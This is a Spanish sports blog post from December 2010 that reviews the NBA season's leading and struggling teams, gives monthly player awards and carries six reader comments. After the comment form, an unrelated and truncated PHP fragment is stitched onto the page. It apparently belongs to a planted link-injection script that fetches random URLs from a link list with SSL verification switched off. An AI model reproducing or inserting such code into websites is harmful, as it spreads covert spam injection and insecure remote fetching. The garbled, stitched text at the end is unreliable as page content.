Informe #3

20 de December de 2010 por TheDeerHunter

Con cierta cuota de retraso nos tiramos a la cara el informe periódico, camino del 2º mes completo de competición.

¿Porqué todos los jugones sonríen igual?

El mejor equipo de lo que llevamos de campeonato son, de forma inesperada, los San Antonio Spurs. Rozan el 90% de victorias y acumulan otra racha de 8, tras haber roto hace poco la que llegaron a acumular de 11. Apenas hemos vislumbrado al mejor Duncan, pero nos encontramos ante la mejor versión conjunta de Parker&Ginobili y cuentan con la mayor profundidad desde la última época de David Robinson.

Sin embargo, los equipos más en forma de la liga durante este último mes están en el Este. Una apreciación más que interesante de alguno de nuestros contertulios es que los Celtics parecen aún más potentes que en el año del último anillo y están a años luz del admirable anterior subcampeonato. Con Rondo lesionado, Jermaine, Delonte, Perkins y Shaq durante gran parte del último mes (nada menos) están jugando de cine, otra vez sobre las espaldas de aquel “Big Three” original, como también de “Shrek y burro”. Si hubiera que apostar diríamos que la mayoría haría bien en jugarse la pasta por ellos.

El último informe que hicimos poníamos de vuelta y media a los Heat y poco menos que condenábamos a Spoelstra a la cola del paro. La lesión de Haslem parecía definitiva. No es el fichaje de Dampier… más bien es que el mejor Wade ha vuelto y con 12 victorias seguidas el nuevo “Big Three” de la playa de Miami parecen más fuertes que nunca.

Por último, además de Bulls, Mavs, Lakers y Thunder que avanzan a buen ritmo, como todos esperábamos, tenemos a tres tapados. Knicks, Sixers y Rockets han registrado un 7-3 en los últimos 10 partidos. Destacar a Landry Fields por el equipo de la gran manzana, rookie del mes de Noviembre en su conferencia, a años luz por encima de otros como Evan Turner, por mencionar a algún ilustre de esta categoría.

Ganarás el pan con el sudor de tu frente.

En el último informe habíamos dado por seguro el MVP del Oeste para Pau. No lo fue. El galardón honorífico de la conferencia cayó a manos de Deron Williams y por el Este para Dwight Howard, en mi opinión razonablemente merecidos. Curiosamente en ambos casos el rendimiento posterior de sus equipos decayó bastante, hasta el punto que los Magic han tirado la casa por la ventana en una inesperada revolución y los Jazz aguantan a duras penas la 5º plaza de su conferencia, eso sí con un calendario bastante complicado. Sin embargo, la sensación común en ambos es que todavía falta dinamita para aspirar a cotas mayores.

Los Suns coquetearon con una inmerecida salida por la puerta de atrás de Steve Nash, pero finalmente parecen haberse movido para darle mejores armas para volver a postemporada. Me atrevería a sugerir que hay varios argumentos subjetivos que le darían el MVP de lo que va de campaña. Traspasarle sería un auténtico disparo en el pie para los intereses de la franquicia tejana.

Me gustaría mencionar también aquí a dos equipos eminentemente perdedores. El primero de ellos son los Ángeles Clippers, con un balance muy mejorable todo este tiempo pero con el inabarcable rayo de esperanza que se llama Blake Griffin. También los Memphis Grizzlies, con una mejora significativa del juego las últimas semanas como también un buen margen para esta misma campaña.

Por último mencionar a los Nuggets y a los Blazers quienes se están dejando la vida por mantener o mejorar sus respectivos estatus en una conferencia tan difícil y con tantas dificultades como las que se están encontrando.

Se dejaban llevar.

Los Hawks han perdido a Joe Johnson y Jamal Crawford las últimas semanas y eso por fuerza se tiene que notar. Su balance no es malo, un 50% en el Este suele asegurarte mantenerte o incluso progresar. El problema es que a los Hawks se les ve excesivamente cómodos en esa 5ª-6ª plaza de su conferencia que les lleva inexorablemente a donde ya saben. Los Bucks les igualan en victorias/derrotas, pero en su caso se les ve con empuje de revertir la situación y más cuando van recuperándose de importantes bajas.

Más preocupante es la situación de los Hornets, que empezaron como tiros. Tras el traspaso de Stojakovic parece que se les ha parado el motor. Nos llegan demasiados partidos en los que sólo Chris Paul y West salvan la cara. Son el eslabón más débil de la zona noble de playoffs en el Oeste y algunos ya los acosan como lobos. La última vez que habíamos hablado de ellos en un informe estában en lo más alto pero a este ritmo se van fuera inexorablemente.

Con el rendimiento de Love&Beasley es increíble que los Wolves están donde están. Hace no mucho Rambis era un gran técnico especialista defensivo en los Lakers de Jackson.

Finalmente Toronto, Charlotte y Detroit se van alejando paulatinamente de sus posibilidades de playoff. Los Warriors con la lesión de Curry inmediatamente después de la de Lee les ha dejado sin gasolina.

El carabasas club.

La humillación de los Cavs frente a LeBron en casa fue un golpe moral muy gordo. El correcto campeonato que venían haciendo se vino abajo como un castillo de naipes. Creemos que es lo normal con una plantilla demasiado cogida por los pelos.

Los Wizards con Wall más tiempo lesionado que jugando han hecho bien de mirar al futuro. Rashard Lewis no les va a quitar de pobres ni de ricos, pero los 20 kilos que se ahorran junto a la progresión de Wall y Young quizás sí lo hagan.

Seguimos sin comprender el bajón colectivo de los Kings y en especial de Tyreke. Al menos últimamente viene jugando muy bien DeMarcus Cousins, con una proyección en condiciones normales incalculable.

Por último el rendimiento de los Nets, por mucho que sea superior en resultados al del año pasado nos parece pésimo. Otro entrenador que no es precísamente la alegría de la huerta para la gestión de proyectos jóvenes.

PREMIOS TJNBA

¿Por qué eres tan bueno?

La gran diferencia entre los Heat del mes pasado a los de este ha sido la recuperación de Dwyane Wade para la causa. Estando bien es un factor muy grande. En diciembre casi 27 puntos, más de 7 rebotes y 4 asistencias, con casi 2 robos de balón y 1 tapón por partido. Esperamos que mejore tanto su liderazgo fuera de la cancha como en ella. Un factor decisivo para sus intereses.

Al salir de clase.

Si lo del mes pasado fue brutal lo de éste es indescriptible. El animal Griffin ha registrado en diciembre nada menos que 22 puntos, 14 rebotes, 4 asistencias y un elenco de mates que no veíamos desde la primera etapa del mejor Vinsanity.

La vida puede ser maravillosa.

Otro que está que lo parte es Kevin Love, aunque es uno de nuestros fijos en “el mayor esfuerzo en vano” posiblemente sea el candidato nº 1 al MIP de este año.

Cortocircuitos S.L.

Una razón terriblemente desagradable: las lesiones. Nos hemos quedado de piedra con el estado físico de Bradon Roy y, sobre todo, con la casi segura gran pérdida para el baloncesto de Yao Ming. No tenemos suerte con ellos.

Comenta

6 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Para mí el mejor base junto a Stockton ha sido Nash, y casualmente creo que también se va ha quedar sin anillo.
    Creo que es el jugador que más cambia o más influencia tiene sobre su equipo, más que Jordan, Payton, Kobe… El juego de los Suns con Nash y sin Nash cambia de forma transcendental.

    P.D. Molaría un repotaje de los jugadores más grandes que no han alcanzado el anillo.

      Citar

  2. Txusma dice:
    #2

    Mala cosa para los Bucks: Brandon Jennings 6 semanas fuera por lesión…

      Citar

  3. Scriers dice:
    #3

    Me sumo a la petición. Lista ya de los mejores jugadores sin anillo 🙂

      Citar

  4. Busky23 dice:
    #4

    Esa lista daría mucho de si,hay varios de los mejores jugadores de la historia sin anillo,muchos por culpa de un numero 23 😉
    Los Spurs siguen encadenando victorias,el banquillo tiene buena parte de culpa,G.Neal me parece un jugador tremendo.
    Dallas,como siempre desde que llego Nowitzki acumulan muchas victorias en RS,veremos a ver cuando llegue lo serio.
    Tengo ganas d ver a los nuevos Suns,hoy en cuadro casi se cargan a los Spurs en su cancha,lo d Nash ya es d leyenda,como comenta The King,el mejor base puro desde el gran Stockton,Gortat tiene que estar dando saltos de alegría.
    Lakers después de un flojo comienzo de mes han recuperado a base de banquillo,Barnes y Brown especialmente han dejado grandes actuaciones.
    Lo peor del mes,las lesiones.
    Enhorabuena por el informe,es un placer leeros a diario.
    Saludos

      Citar

  5. sayim dice:
    #5

    enhorabuena por el informe, sólo una cosa: Phoenix no pertenece a Texas…

      Citar

  6. TheDeerHunter dice:
    #6

    Arizona, claro… perdón por el lapsus

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>